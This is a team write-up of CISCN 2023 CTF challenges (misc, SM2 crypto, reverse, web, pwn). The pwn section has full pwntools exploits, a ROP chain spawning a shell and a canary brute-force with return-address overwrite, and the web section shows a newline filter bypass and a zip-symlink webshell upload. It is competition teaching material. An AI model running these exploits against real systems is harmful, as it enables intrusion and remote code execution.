CISCN_Dozer team write-up

Published 2023-05-28 23:30:34, author: 浮虚千年

Misc

Sign-in

Code: print(open('/flag').read())
This prints the flag.

Encrypted production traffic

Follow the TCP stream tcp.stream eq 0.
[screenshot]
Base32-decoding "MMYWMX3GNEYWOXZRGAYDA===" gives the flag.

pyshell

Sandbox escape: there is a length limit plus an allowlist, so build the payload with string concatenation using only allowlisted characters.
[screenshot]

国粹 (Guocui)

a and k are coordinates: treat the table in the challenge image as the horizontal and vertical axes and fill in the cell at coordinate (a, k).
[screenshot]

Crypto

Keys based on the SM2 national standard algorithm

Public key A_Public_Key
7624DAC71A7D3E142979AA800B65005E743F0C62FCB771AC81849316B8E21E16BC3B3EFF9F42C53D1B933C69E8DE20EFD477D8AAD4E595781F50250EA1D1DA21
Private key A_Private_Key
1F43875CE7F4984973900E242C915CE324574F5A19AA6D348846F96753D9A831
Public key B_Public_Key
042c5e9a5ee7fa9e83437b5e92c7d695027ecde1807982961adfdf4622275da34bbfcbde575621d81335e7916f656b36de5ba1b7bc003f1b8c5c8a62db625da3d8
Private key B ciphertext
c882c5209f00c20245e3c967634f81fc3ef398ec039355ff6b6ec2053f6bd6a7
Private key b plaintext
C2 A1 C9 75 7A D1 97 E8 E9 6D 5C 0F 53 86 DA 0A BB 28 16 11 DA 58 71 24 B1 52 81 85 BB 38 46 EA
c ciphertext
41fb2d26589b420faee4c498f6b309ead00681bbb28dc4d98c49830489c061ef6917fc524126fbe3c9492c447f8a415414e8301fa9be6938b3edea175890dceaadec874ee0d3e321b4dfa0ef27b93586d8c6df76fbe4b7beae795f566d3fc1580904a375483c5149ddad2fda16c68106
c plaintext
BD 37 75 32 F5 15 0D DB C6 10 9A E6 93 1D 6B 40
d ciphertext
4138c6bb7a4ebe754e0e0b313b7b4b9299832e458eb1c5b635200f1782cbcecad7444e6884af2b0733e1448d0205a43dada5e288ce8fc32324c4a48627f5a65204d8ecf80c999bc09a3b0d7b19b936fa082fbdcc8ed818ed05b6caa568ca44a24e2b2e7f7e9d6e3245bae24554758fd0
d plaintext
5D 19 64 7C E1 AD 02 72 ED 06 96 B9 5D 50 DE 71
[screenshot]

Trusted Measurement

Command: find * | grep -ra "flag{"
This finds the flag.

Sign_in_passwd

URL encoding: [screenshot]
Base64: [screenshot]

reverse

babyre

Download it; the first line gives the official website.
[screenshot]
Open the site, import the source to get the compiled result, and analyze it.
[screenshot]
In the screenshot the list is on the left and the logic on the right. There are two operations, "letter i of key" and "letter i-1 of key", and the first ASCII code in the list converts to the character "f", which suggests that each byte is XORed with the previous one. The script below recovers the flag.

# Byte values copied from the list in the screenshot.
ciphertext_list = [102,10,13,6,28,74,3,1,3,7,85,0,4,75,20,92,92,8,28,25,81,83,7,28,76,88,9,0,29,73,0,86,4,87,87,82,84,85,4,85,87,30]
# Each byte was XORed with the previous key letter, so undo it in place from left
# to right: after the update, ciphertext_list[i - 1] already holds the recovered plaintext byte.
for i in range(1, len(ciphertext_list)):
    ciphertext_list[i] = ciphertext_list[i - 1] ^ ciphertext_list[i]
for i in ciphertext_list:
    print(chr(i), end='')

web

dumpit

[screenshot]
The challenge says to try ?db=&table_2_query= or ?db=&table_2_dump=
First try ?db=ctf&table_2_query=flag1
[screenshot]
This looks like it queries data from a table.
The other one, ?db=ctf&table_2_dump=flag1
[screenshot]
This looks like an access log.
We queried a lot; all of it was fake flags.
[screenshot]
The log output was always the same, so it seemed flag1 was being filtered. With %0a, the full SQL statement log came out.
[screenshot]
Reading through it, there was still no real flag, so we figured the flag might not be in the database. Remembering earlier template-injection challenges where the flag sat in /etc/passwd, tmp or env, we guessed it might be in an environment variable.
http://eci-2zeifb8rijs2733nu61o.cloudeci1.ichunqiu.com:8888/?db=ctf&table_2_dump=env
http://eci-2zeifb8rijs2733nu61o.cloudeci1.ichunqiu.com:8888/?db=ctf&table_2_query=env
Nothing. Try the %0a bypass:
http://eci-2zeifb8rijs2733nu61o.cloudeci1.ichunqiu.com:8888/?db=ctf&table_2_dump= env
[screenshot]
Found the flag.
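The %0a and space prefixes work because an exact-match denylist compares the raw parameter while the backend ignores leading whitespace. As an added example (a hypothetical reconstruction, not the challenge's source), here is that weak filter beside an allowlist check that rejects such inputs; the table names are constructed.

```python
import re

# Hypothetical reconstruction of the challenge's filter: an exact-match denylist.
DENIED = {"flag1", "env"}

def weak_filter_accepts(table):
    """Denylist by exact comparison: '\\nenv' and ' env' are not in the set, so they
    pass, even though a shell or SQL backend treats them the same as 'env'."""
    return table not in DENIED

# Constructed allowlist: the only table names this endpoint should ever serve.
ALLOWED_TABLES = {"users", "orders"}
# \Z (not $) so a trailing newline cannot sneak past the anchor.
NAME_RE = re.compile(r"\A[A-Za-z0-9_]{1,64}\Z")

def strict_filter_accepts(table):
    """Allowlist: the raw parameter must be a plain identifier and a known table.
    Nothing is stripped first, so whitespace or newline prefixes are rejected
    instead of being silently normalised away."""
    return bool(NAME_RE.match(table)) and table in ALLOWED_TABLES

def classify(values):
    """Run both filters over probe values (the write-up's %0a and %20 decoded)."""
    return {v: (weak_filter_accepts(v), strict_filter_accepts(v)) for v in values}

if __name__ == "__main__":
    for v, (weak, strict) in classify(["flag1", "env", "\nenv", " env", "users"]).items():
        print(repr(v), "weak:", weak, "strict:", strict)
```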

unzip

ln -s /var/www/html test
[screenshot]
Create a symlink pointing to /var/www/html and zip it.
[screenshot]
Write a webshell into the test directory.
[screenshot]
Zip it again (ln -s /var/www/html test).
[screenshot]
Then upload test first, then test1.
At that point the server already has /tmp/test, a symlink to /var/www/html; when test1.zip is then uploaded and extracted, test.php actually gets extracted into the /tmp/test directory.
Then cat the flag.
[screenshot]
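A defender-side check for this symlink trick, added here as an example and not part of the write-up or the challenge: before extracting an uploaded archive, refuse members whose Unix mode bits mark them as symlinks and members whose real path resolves outside the destination. Because the path check follows links that already exist, it also rejects the second upload once /tmp/test is a symlink. The archive names and contents are constructed.

```python
import os
import stat
import tempfile
import zipfile

def unsafe_members(zip_path, dest):
    """Names of members that must not be extracted into dest: symlink entries
    (Unix mode lives in the high 16 bits of external_attr) and entries whose
    real path lands outside dest. realpath follows links already present under
    dest, so 'test/test.php' is rejected once 'test' is a link."""
    bad = []
    dest_real = os.path.realpath(dest)
    with zipfile.ZipFile(zip_path) as zf:
        for info in zf.infolist():
            if stat.S_ISLNK(info.external_attr >> 16):
                bad.append(info.filename)
                continue
            target = os.path.realpath(os.path.join(dest_real, info.filename))
            if os.path.commonpath([dest_real, target]) != dest_real:
                bad.append(info.filename)
    return bad

def build_demo_archives(workdir):
    """Constructed samples: a symlink member like the write-up's
    'test -> /var/www/html', a '../' traversal member, and a clean archive."""
    link, trav, clean = (os.path.join(workdir, n) for n in ("link.zip", "trav.zip", "clean.zip"))
    with zipfile.ZipFile(link, "w") as zf:
        zi = zipfile.ZipInfo("test")
        zi.external_attr = (stat.S_IFLNK | 0o777) << 16  # mark the entry as a symlink
        zf.writestr(zi, "/var/www/html")                 # a link entry's body is its target
    with zipfile.ZipFile(trav, "w") as zf:
        zf.writestr("../escape.txt", "x")
    with zipfile.ZipFile(clean, "w") as zf:
        zf.writestr("test/readme.txt", "hello")
    return link, trav, clean

def demo():
    """Build the samples in a temp dir and report what the check flags."""
    work = tempfile.mkdtemp()
    out = os.path.join(work, "out")
    os.makedirs(out)
    link, trav, clean = build_demo_archives(work)
    return {"link": unsafe_members(link, out),
            "trav": unsafe_members(trav, out),
            "clean": unsafe_members(clean, out)}

if __name__ == "__main__":
    print(demo())  # {'link': ['test'], 'trav': ['../escape.txt'], 'clean': []}
```

Python's own zipfile writes a symlink member out as a regular file, so the check matters most for services that hand the upload to an external unzip tool, as the challenge did.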

pwn

烧烤摊儿 (BBQ Stall)

Since this binary is statically linked, gadgets can be taken directly from the program itself.
[screenshot]
Modify money through pijiu: it is an unsigned integer, so simply set it to a negative value (-999999).
[screenshot]
Enter the vip function and modify the value of own.
Use ROPgadget --binary p3 --ropchain to get the payload.
[screenshot]
Exploit:

from pwn import *
from struct import pack

sh = remote('39.105.187.49', 34749)
# sh = process('./p3')
elf = ELF('./p3')

# Menu: buy beer with a negative amount (money is unsigned, so it wraps),
# then go through the vip option to the vulnerable function.
sh.sendlineafter(b'> ', b"1")
sh.sendlineafter(b'\n', b"1")
sh.sendlineafter(b'\n', b"-999999")
sh.sendlineafter(b'> ', b"4")
sh.sendlineafter(b'> ', b"5")

# ROP chain as generated by ROPgadget --ropchain: store "/bin//sh\0" in .data,
# set rdi/rsi/rdx, count rax up to 59 (execve) and issue the syscall.
p = b''
p += b'a' * 0x28
p += pack('<Q', 0x000000000040a67e) # pop rsi ; ret
p += pack('<Q', 0x00000000004e60e0) # @ .data
p += pack('<Q', 0x0000000000458827) # pop rax ; ret
p += b'/bin//sh'
p += pack('<Q', 0x000000000045af95) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x000000000040a67e) # pop rsi ; ret
p += pack('<Q', 0x00000000004e60e8) # @ .data + 8
p += pack('<Q', 0x0000000000447339) # xor rax, rax ; ret
p += pack('<Q', 0x000000000045af95) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x000000000040264f) # pop rdi ; ret
p += pack('<Q', 0x00000000004e60e0) # @ .data
p += pack('<Q', 0x000000000040a67e) # pop rsi ; ret
p += pack('<Q', 0x00000000004e60e8) # @ .data + 8
p += pack('<Q', 0x00000000004a404b) # pop rdx ; pop rbx ; ret
p += pack('<Q', 0x00000000004e60e8) # @ .data + 8
p += pack('<Q', 0x4141414141414141) # padding
p += pack('<Q', 0x0000000000447339) # xor rax, rax ; ret
p += pack('<Q', 0x0000000000496710) * 59 # add rax, 1 ; ret  (repeated 59 times: rax = 59 = SYS_execve)
p += pack('<Q', 0x0000000000402404) # syscall
sh.sendline(p)
sh.interactive()


funcanary

The main function is shown below; PIE (address randomization) and canary are enabled.
[screenshot]
Inside the function there is a read call that serves as the brute-force point.
[screenshot]
There is also a fork(), so the program keeps running in forked child processes, which inherit the parent's canary; so we consider brute-forcing the canary.
Exploit:

from pwn import *

p = remote("39.105.26.155", 32292)
p.recvuntil(b'welcome\n')

# Brute-force the canary one byte at a time: the lowest byte is always 0x00,
# and every forked child carries the same canary, so a wrong guess only kills
# that child while a correct one lets it print "fun".
canary = b'\x00'
for k in range(7):
    for i in range(256):
        payload = b'a' * 0x68 + canary + bytes([i])
        p.send(payload)
        data = p.recvuntil(b"welcome\n")
        print(data)
        if b"fun" in data:
            canary += bytes([i])
            print("canary is: " + canary.hex())
            break

# Keep the canary intact, skip the saved rbp, and overwrite the low two bytes
# of the return address with the backdoor's offset.
back_door = 0x1231
payload = b'a' * 0x68 + canary + b'a' * 8 + p16(back_door)

p.send(payload)
p.interactive()